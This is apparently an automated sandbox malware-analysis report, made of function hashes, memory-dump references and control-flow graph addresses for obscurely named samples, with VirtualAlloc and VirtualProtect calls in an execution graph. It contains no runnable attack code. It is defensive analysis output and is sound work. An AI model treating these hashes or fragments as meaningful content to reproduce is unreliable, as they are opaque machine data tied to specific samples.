                                                                                                                                      • Instruction ID: 214dccc7266388b8657290419d759afd2bc0c73a56af4698552b24b78792b689
                                                                                                                                      • Opcode Fuzzy Hash: a6664421b6a48d8d84025898304878ffcb0d47582e1ad8af7b763e81078861ed
                                                                                                                                      • Instruction Fuzzy Hash: B5319BB1A0991D8FDFA8DF14C855AE9B7B1FB68305F1041EE810EE32A4CB759A81CF45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B890C2D Relevance: .1, Instructions: 85COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8ff3a91200fb5ff013c06565e2eff18676fedaf2a5975d97fe4386b526fcb5c2
                                                                                                                                      • Instruction ID: 431dfe144c30b609d5e745bfe78029c5172ea66a8cabed548342b3b0987cd3a8
                                                                                                                                      • Opcode Fuzzy Hash: 8ff3a91200fb5ff013c06565e2eff18676fedaf2a5975d97fe4386b526fcb5c2
                                                                                                                                      • Instruction Fuzzy Hash: D0310571F1D29E8FEB269BA8C8212BD7BB0EF4A314F0605B7D455D71E2CA382605C741
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8911BE Relevance: .1, Instructions: 68COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e1967f403786280bb2001c5f202144bf383642b8a1c93168782d4ad33ae4dd3d
                                                                                                                                      • Instruction ID: 701e5e1f7642b389f3e43ae795636d932b05f18709c6f54b77500d77e74d2a02
                                                                                                                                      • Opcode Fuzzy Hash: e1967f403786280bb2001c5f202144bf383642b8a1c93168782d4ad33ae4dd3d
                                                                                                                                      • Instruction Fuzzy Hash: 87211A30A1891E9FDF94FFA8C8949ADB7F1FF58301B1105B9D009E32A5DB34A941CB40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B890AD3 Relevance: .1, Instructions: 62COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9663d668149dc81023f2036e9d6682ea7c46d406f2fa1630d7048bc296657920
                                                                                                                                      • Instruction ID: 761ce3c7de7de6197c4ed15d1130c3ac6e1a65da7b0a5f096225a63f170a0c77
                                                                                                                                      • Opcode Fuzzy Hash: 9663d668149dc81023f2036e9d6682ea7c46d406f2fa1630d7048bc296657920
                                                                                                                                      • Instruction Fuzzy Hash: C501D23931495E8FCB51EF6CE8046DA7BD0FBAD362B000073E148C3164C260A956D7E0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8929D2 Relevance: .1, Instructions: 59COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9f1a33666e83b00e52882db6e38dfedfc74b0fa576b07d140668391129623571
                                                                                                                                      • Instruction ID: 7babaff4fec0ba28ac7ee3d6eba4682de6552ac3af9e7c91266e9b30b3466657
                                                                                                                                      • Opcode Fuzzy Hash: 9f1a33666e83b00e52882db6e38dfedfc74b0fa576b07d140668391129623571
                                                                                                                                      • Instruction Fuzzy Hash: F7214A71A0961E8FEB74EB18C9586F8B7F1EF58711F0002EAE04DD32A5DA751B818F40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B890AFB Relevance: .1, Instructions: 53COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b6a0ce2296ba62487a474dc11cdd23f17944591d5dbeac4b08649953ba6499e5
                                                                                                                                      • Instruction ID: 8adc3e90bdef216c796c9b30d6a564885d41c822903aedd5b0156e02c1bb5c2a
                                                                                                                                      • Opcode Fuzzy Hash: b6a0ce2296ba62487a474dc11cdd23f17944591d5dbeac4b08649953ba6499e5
                                                                                                                                      • Instruction Fuzzy Hash: A201DB31608A0ECFDB50EF6CE844ADA7BE0FF68368B000136E45CC3169C630A964CB92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89A1E2 Relevance: .0, Instructions: 48COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6258ec8e384b85e61435f6f82e4e9a9ef9c56e3516529d41b0ef4026365d9c6a
                                                                                                                                      • Instruction ID: 4bd7be66161077980eabd08e25db2dbe97682e0ef14343bd0e45be5c18e1855e
                                                                                                                                      • Opcode Fuzzy Hash: 6258ec8e384b85e61435f6f82e4e9a9ef9c56e3516529d41b0ef4026365d9c6a
                                                                                                                                      • Instruction Fuzzy Hash: E821C770E0A61E9FFFA4EB54C958BE9B6B0EB98311F1001E5C14D923A0DE396AC4CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B890C48 Relevance: .0, Instructions: 47COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f87cf932d4a8042efa0837055c7aba6490683b4b72d0688ffecf9ae0750129fb
                                                                                                                                      • Instruction ID: 5801246a18c2f0b4e1261602dc30a9021ef5290768ea3c3f11a2d2a3914a5ed5
                                                                                                                                      • Opcode Fuzzy Hash: f87cf932d4a8042efa0837055c7aba6490683b4b72d0688ffecf9ae0750129fb
                                                                                                                                      • Instruction Fuzzy Hash: 8C11C872E0D28D8FE7129BA4CC141EA7B70EF46314F0645B7D411DB1E6DA386614C751
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B890C50 Relevance: .0, Instructions: 42COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ab822fb944a61506b907ca106dd32c3e7777854d7bbb4a7c2a392c04ac14ef23
                                                                                                                                      • Instruction ID: bee1121856cecf74fc42cf329ff2d532b73f3f450853bbf657ed30858b839783
                                                                                                                                      • Opcode Fuzzy Hash: ab822fb944a61506b907ca106dd32c3e7777854d7bbb4a7c2a392c04ac14ef23
                                                                                                                                      • Instruction Fuzzy Hash: B401F531E0E28E8FEB129BA4C8242EE7BB0EF46314F0545B3D421DB1E6CA3C2614C741
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B890BA5 Relevance: .0, Instructions: 40COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7e5090a08b0e8254632c2cc10569c752c4e4ab5caed443123a28a6460a150adf
                                                                                                                                      • Instruction ID: 0af37680a224073d0de575f9140b055ac29aa7ca0602de74ee668447357fb136
                                                                                                                                      • Opcode Fuzzy Hash: 7e5090a08b0e8254632c2cc10569c752c4e4ab5caed443123a28a6460a150adf
                                                                                                                                      • Instruction Fuzzy Hash: 0A01D270A2468D8FCB94EF58C841AAA7BE0FB58308F1105A9E859D3254CA34E960CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8913A0 Relevance: .0, Instructions: 33COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a0d4ea9026ce9d2ffd39faf31ab849bd3b617f942b2a503b950c1bc3d4722810
                                                                                                                                      • Instruction ID: 5f3f7f7b4e3936843db1e761d48564ec2f8b881627e5bc47a1d60aeac5ecfa8c
                                                                                                                                      • Opcode Fuzzy Hash: a0d4ea9026ce9d2ffd39faf31ab849bd3b617f942b2a503b950c1bc3d4722810
                                                                                                                                      • Instruction Fuzzy Hash: FDF0BD70A14A4DDFDF94EF68D449AAA7BE0FF58304F010465F81CC3264D630E6A0CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8906E8 Relevance: .0, Instructions: 33COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f0c5cbfe85e94a54f3b706198ec0f3f66240f5c1f5a7cf7bbc9b1fb10b21cedb
                                                                                                                                      • Instruction ID: 3cf2a8e47d64d18e04920ac62de1edf71091619804d8538d3c46a9edd6080390
                                                                                                                                      • Opcode Fuzzy Hash: f0c5cbfe85e94a54f3b706198ec0f3f66240f5c1f5a7cf7bbc9b1fb10b21cedb
                                                                                                                                      • Instruction Fuzzy Hash: C1F0543091550DDFEB94EFA4D8596EEBBE0FF18304F110576E41CD21A5DA34A6A0CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B892171 Relevance: .0, Instructions: 24COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8cc9517adb5a4d66aac6172aca77357e6f2bd599f88043dfcddfb140c9bc0efe
                                                                                                                                      • Instruction ID: 88950dd2e5f62345be6c3779099de7d927f27c2d5e180ebea6cb4b7fabe114eb
                                                                                                                                      • Opcode Fuzzy Hash: 8cc9517adb5a4d66aac6172aca77357e6f2bd599f88043dfcddfb140c9bc0efe
                                                                                                                                      • Instruction Fuzzy Hash: DDF0FE70E1961E8BEBE8DF18CC646E87BB1EF94344F0041F9A00D936A5CE346E818F41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 00007FFD9BA0018F Relevance: 155.7, Strings: 113, Instructions: 14464COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1785986261.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba00000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $!$"$#$$$%$&$'$($)$*$+$,$-$.$/$0$1$2$3$4$5$6$7$8$9$:$;$<$=$>$?$@$A$B$BsQ$BsQ$BsQ$BsQ$BsQ$BsQ$BsQ$C$D$D$E$F$G$H$I$J$K$L$M$N$O$P$Q$R$S$T$U$V$W$X$Y$Z$[$\$]$^$_$`$a$b$c$d$e$e$f$g$h$i$j$k$kwgM$kwgM$kwgM$kwgM$l$m$n$o$p$q$r$s$s_W$s_W$s_W$t$u$v$w$x$y$z${$|$}$~$xK$xK
                                                                                                                                      • API String ID: 0-1833979755
                                                                                                                                      • Opcode ID: 75ab7a8b0a4bd2b10d87ad2b64f9a52bfd44cae8b9368edc6d22221d822f8fb8
                                                                                                                                      • Instruction ID: bb09008e73a91a9fdf5358332b844c43eca8daac69c4797ede39235524c6d5a1
                                                                                                                                      • Opcode Fuzzy Hash: 75ab7a8b0a4bd2b10d87ad2b64f9a52bfd44cae8b9368edc6d22221d822f8fb8
                                                                                                                                      • Instruction Fuzzy Hash: 9C640D70A146198FDB69EB18DDA5AE9B3B1FF48304F5041EAD00EA7291DF35AE85CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:4.8%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:7
                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                      execution_graph 16065 7ffd9b8903fe 16066 7ffd9b89040d VirtualProtect 16065->16066 16068 7ffd9b89054d 16066->16068 16061 7ffd9b891ae1 16062 7ffd9b891aff 16061->16062 16063 7ffd9b891efd VirtualAlloc 16062->16063 16064 7ffd9b891f55 16063->16064

                                                                                                                                      Executed Functions

                                                                                                                                      Function 00007FFD9B899FAF Relevance: 5.1, Strings: 3, Instructions: 1359COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 7ffd9b899faf-7ffd9b89a15c 15 7ffd9b89a882-7ffd9b89a88f 0->15 16 7ffd9b89a895-7ffd9b89a8d7 15->16 17 7ffd9b89a161-7ffd9b89a16f 15->17 25 7ffd9b89a994-7ffd9b89a99a 16->25 19 7ffd9b89a176-7ffd9b89a25c 17->19 20 7ffd9b89a171 17->20 38 7ffd9b89a25e-7ffd9b89a287 19->38 39 7ffd9b89a28d-7ffd9b89a2e7 19->39 20->19 27 7ffd9b89a8dc-7ffd9b89a939 25->27 28 7ffd9b89a9a0-7ffd9b89a9e2 25->28 41 7ffd9b89a966-7ffd9b89a991 27->41 42 7ffd9b89a93b-7ffd9b89a93f 27->42 40 7ffd9b89ac04-7ffd9b89ac0a 28->40 38->39 61 7ffd9b89a2f6-7ffd9b89a34b 39->61 62 7ffd9b89a2e9-7ffd9b89a2f1 39->62 43 7ffd9b89a9e7-7ffd9b89ab2f 40->43 44 7ffd9b89ac10-7ffd9b89ac69 40->44 41->25 42->41 45 7ffd9b89a941-7ffd9b89a963 42->45 97 7ffd9b89ab95-7ffd9b89ab99 43->97 98 7ffd9b89ab31-7ffd9b89ab93 43->98 53 7ffd9b89acf8-7ffd9b89ad06 44->53 54 7ffd9b89ac6f-7ffd9b89acbb 44->54 45->41 60 7ffd9b89ad0d-7ffd9b89ad4f 53->60 54->53 74 7ffd9b89b137-7ffd9b89b13d 60->74 79 7ffd9b89a35a-7ffd9b89a3af 61->79 80 7ffd9b89a34d-7ffd9b89a355 61->80 63 7ffd9b89a86d-7ffd9b89a87f 62->63 63->15 77 7ffd9b89ad54-7ffd9b89add4 74->77 78 7ffd9b89b143-7ffd9b89b177 call 7ffd9b89c00a 74->78 94 7ffd9b89add6-7ffd9b89ade2 77->94 95 7ffd9b89ae04-7ffd9b89ae13 77->95 101 7ffd9b89b179-7ffd9b89b187 78->101 105 7ffd9b89a3be-7ffd9b89a413 79->105 106 7ffd9b89a3b1-7ffd9b89a3b9 79->106 80->63 110 7ffd9b89ae31-7ffd9b89ae39 94->110 111 7ffd9b89ade4-7ffd9b89adf9 94->111 103 7ffd9b89ae15 95->103 104 7ffd9b89ae1a-7ffd9b89ae29 95->104 99 7ffd9b89ab9b-7ffd9b89abcd 97->99 100 7ffd9b89abcf-7ffd9b89abe2 97->100 121 7ffd9b89abe3-7ffd9b89ac01 98->121 99->121 100->121 117 7ffd9b89b192-7ffd9b89b21b 101->117 103->104 108 7ffd9b89ae2b-7ffd9b89ae2c 104->108 109 7ffd9b89ae3e-7ffd9b89ae59 104->109 133 7ffd9b89a415-7ffd9b89a41d 105->133 134 7ffd9b89a422-7ffd9b89a477 105->134 106->63 108->110 114 7ffd9b89ae79-7ffd9b89b0dd 109->114 115 7ffd9b89ae5b-7ffd9b89ae75 109->115 113 7ffd9b89b116-7ffd9b89b134 110->113 111->95 113->74 128 7ffd9b89b12c-7ffd9b89b134 114->128 129 7ffd9b89b0df-7ffd9b89b10b 114->129 115->114 137 7ffd9b89b221-7ffd9b89b2aa 117->137 138 7ffd9b89b2b3-7ffd9b89b2d5 117->138 121->40 128->74 129->113 133->63 153 7ffd9b89a486-7ffd9b89a4db 134->153 154 7ffd9b89a479-7ffd9b89a481 134->154 137->138 166 7ffd9b89b2ac 137->166 145 7ffd9b89b426-7ffd9b89b4bc 138->145 146 7ffd9b89b2db-7ffd9b89b326 138->146 169 7ffd9b89b57f-7ffd9b89b5c5 145->169 170 7ffd9b89b4c2-7ffd9b89b4ce 145->170 159 7ffd9b89b40d-7ffd9b89b41a 146->159 178 7ffd9b89a4ea-7ffd9b89a53f 153->178 179 7ffd9b89a4dd-7ffd9b89a4e5 153->179 154->63 160 7ffd9b89b32b-7ffd9b89b339 159->160 161 7ffd9b89b420-7ffd9b89b421 159->161 167 7ffd9b89b33b 160->167 168 7ffd9b89b340-7ffd9b89b3a2 160->168 165 7ffd9b89b734-7ffd9b89b793 161->165 190 7ffd9b89ba5b-7ffd9b89ba88 165->190 166->138 167->168 176 7ffd9b89b3a9-7ffd9b89b3fb 168->176 177 7ffd9b89b3a4 168->177 189 7ffd9b89b5cc-7ffd9b89b5d2 169->189 180 7ffd9b89b51d-7ffd9b89b57d call 7ffd9b899a58 170->180 181 7ffd9b89b4d0-7ffd9b89b51c 170->181 206 7ffd9b89b405-7ffd9b89b40a 176->206 207 7ffd9b89b3fd-7ffd9b89b402 176->207 177->176 208 7ffd9b89a54e-7ffd9b89a5a3 178->208 209 7ffd9b89a541-7ffd9b89a549 178->209 179->63 180->189 181->180 193 7ffd9b89b721-7ffd9b89b72e 189->193 203 7ffd9b89b798-7ffd9b89b7d4 190->203 204 7ffd9b89ba8e-7ffd9b89bab2 call 7ffd9b89c043 190->204 193->165 197 7ffd9b89b5d7-7ffd9b89b5e5 193->197 199 7ffd9b89b5e7 197->199 200 7ffd9b89b5ec-7ffd9b89b646 197->200 199->200 220 7ffd9b89b6b6-7ffd9b89b6de 200->220 221 7ffd9b89b648-7ffd9b89b670 200->221 215 7ffd9b89b7d6-7ffd9b89b7ed 203->215 216 7ffd9b89b7f1-7ffd9b89ba58 203->216 226 7ffd9b89babb-7ffd9b89baef 204->226 227 7ffd9b89bab4 204->227 206->159 207->206 235 7ffd9b89a5a5-7ffd9b89a5ad 208->235 236 7ffd9b89a5b2-7ffd9b89a607 208->236 209->63 215->216 216->190 228 7ffd9b89b6e5-7ffd9b89b70e 220->228 229 7ffd9b89b6e0 220->229 224 7ffd9b89b677-7ffd9b89b6b4 221->224 225 7ffd9b89b672 221->225 241 7ffd9b89b719-7ffd9b89b71e 224->241 225->224 233 7ffd9b89bb0f-7ffd9b89bb35 226->233 234 7ffd9b89baf1-7ffd9b89bafe 226->234 227->226 228->241 229->228 238 7ffd9b89bb05-7ffd9b89bb0d 234->238 239 7ffd9b89bb00 234->239 235->63 246 7ffd9b89a616-7ffd9b89a66b 236->246 247 7ffd9b89a609-7ffd9b89a611 236->247 238->233 239->238 241->193 251 7ffd9b89a67a-7ffd9b89a6cf 246->251 252 7ffd9b89a66d-7ffd9b89a675 246->252 247->63 256 7ffd9b89a6de-7ffd9b89a733 251->256 257 7ffd9b89a6d1-7ffd9b89a6d9 251->257 252->63 261 7ffd9b89a735-7ffd9b89a73d 256->261 262 7ffd9b89a742-7ffd9b89a797 256->262 257->63 261->63 266 7ffd9b89a7a6-7ffd9b89a7fb 262->266 267 7ffd9b89a799-7ffd9b89a7a1 262->267 271 7ffd9b89a807-7ffd9b89a85c 266->271 272 7ffd9b89a7fd-7ffd9b89a805 266->272 267->63 276 7ffd9b89a868-7ffd9b89a86a 271->276 277 7ffd9b89a85e-7ffd9b89a866 271->277 272->63 276->63 277->63
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 2$H$zM_H
                                                                                                                                      • API String ID: 0-2006335857
                                                                                                                                      • Opcode ID: 9c3f8117c0ce193a85995367ee3fa3e5d59da48ed6e019a803ff87b08c834420
                                                                                                                                      • Instruction ID: 19454bbd17550fad09603b8e01848d1e4e3652dc24b868b504a1118b492a37ce
                                                                                                                                      • Opcode Fuzzy Hash: 9c3f8117c0ce193a85995367ee3fa3e5d59da48ed6e019a803ff87b08c834420
                                                                                                                                      • Instruction Fuzzy Hash: 7AC2D774E1992D8FDBA8DB58C8A4BA9B7B1FF58300F5041E9D01DE72A5DB346A81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8C312D Relevance: 1.8, Strings: 1, Instructions: 515COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 325 7ffd9b8c312d-7ffd9b8c314c 327 7ffd9b8c3196-7ffd9b8c323a 325->327 328 7ffd9b8c314e-7ffd9b8c3182 325->328 332 7ffd9b8c323c-7ffd9b8c3241 327->332 333 7ffd9b8c3244-7ffd9b8c324d 327->333 329 7ffd9b8c3189-7ffd9b8c3190 328->329 330 7ffd9b8c3184 328->330 329->327 330->329 332->333 334 7ffd9b8c36dd-7ffd9b8c36e3 333->334 335 7ffd9b8c36e9-7ffd9b8c3702 334->335 336 7ffd9b8c3252-7ffd9b8c327c 334->336 337 7ffd9b8c327e 336->337 338 7ffd9b8c3283-7ffd9b8c329c 336->338 337->338 339 7ffd9b8c329e 338->339 340 7ffd9b8c32a3-7ffd9b8c32bd 338->340 339->340 342 7ffd9b8c32bf 340->342 343 7ffd9b8c32c4-7ffd9b8c32dc 340->343 342->343 344 7ffd9b8c32de 343->344 345 7ffd9b8c32e3-7ffd9b8c3304 343->345 344->345 346 7ffd9b8c3306-7ffd9b8c330a 345->346 347 7ffd9b8c3372-7ffd9b8c338f 345->347 346->347 350 7ffd9b8c330c-7ffd9b8c3320 346->350 348 7ffd9b8c3396-7ffd9b8c33af 347->348 349 7ffd9b8c3391 347->349 351 7ffd9b8c33b6-7ffd9b8c33d0 348->351 352 7ffd9b8c33b1 348->352 349->348 353 7ffd9b8c3364-7ffd9b8c336a 350->353 356 7ffd9b8c33d7-7ffd9b8c33ef 351->356 357 7ffd9b8c33d2 351->357 352->351 354 7ffd9b8c336c-7ffd9b8c336d 353->354 355 7ffd9b8c3322-7ffd9b8c3326 353->355 358 7ffd9b8c3403-7ffd9b8c343a 354->358 359 7ffd9b8c3328-7ffd9b8c332e 355->359 360 7ffd9b8c3331-7ffd9b8c3347 355->360 361 7ffd9b8c33f6-7ffd9b8c3400 356->361 362 7ffd9b8c33f1 356->362 357->356 363 7ffd9b8c343c-7ffd9b8c3441 358->363 364 7ffd9b8c3444-7ffd9b8c3520 358->364 359->360 365 7ffd9b8c3349 360->365 366 7ffd9b8c334e-7ffd9b8c3361 360->366 361->358 362->361 363->364 367 7ffd9b8c352a-7ffd9b8c359f 364->367 368 7ffd9b8c3522-7ffd9b8c3527 364->368 365->366 366->353 369 7ffd9b8c35f8-7ffd9b8c35fc 367->369 370 7ffd9b8c35a1-7ffd9b8c35ba 367->370 368->367 373 7ffd9b8c35fe 369->373 374 7ffd9b8c3603-7ffd9b8c361c 369->374 371 7ffd9b8c35bc-7ffd9b8c35c0 370->371 372 7ffd9b8c362d-7ffd9b8c3644 370->372 371->372 378 7ffd9b8c35c2-7ffd9b8c35d1 371->378 376 7ffd9b8c3646 372->376 377 7ffd9b8c364b-7ffd9b8c3665 372->377 373->374 375 7ffd9b8c361f-7ffd9b8c3625 374->375 379 7ffd9b8c3627-7ffd9b8c3628 375->379 380 7ffd9b8c35d3-7ffd9b8c35d7 375->380 376->377 381 7ffd9b8c3667 377->381 382 7ffd9b8c366c-7ffd9b8c3690 377->382 378->375 383 7ffd9b8c36d5-7ffd9b8c36da 379->383 386 7ffd9b8c35eb-7ffd9b8c35f2 380->386 387 7ffd9b8c35d9-7ffd9b8c35e8 380->387 381->382 384 7ffd9b8c3697-7ffd9b8c36bb 382->384 385 7ffd9b8c3692 382->385 383->334 388 7ffd9b8c36bd 384->388 389 7ffd9b8c36c2-7ffd9b8c36d3 384->389 385->384 386->369 387->386 388->389 389->383
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Em>N
                                                                                                                                      • API String ID: 0-488659082
                                                                                                                                      • Opcode ID: 4a27930f80629b0f48b23d86148c851c204864b7fa99f2e4b6ad1b596a5f9019
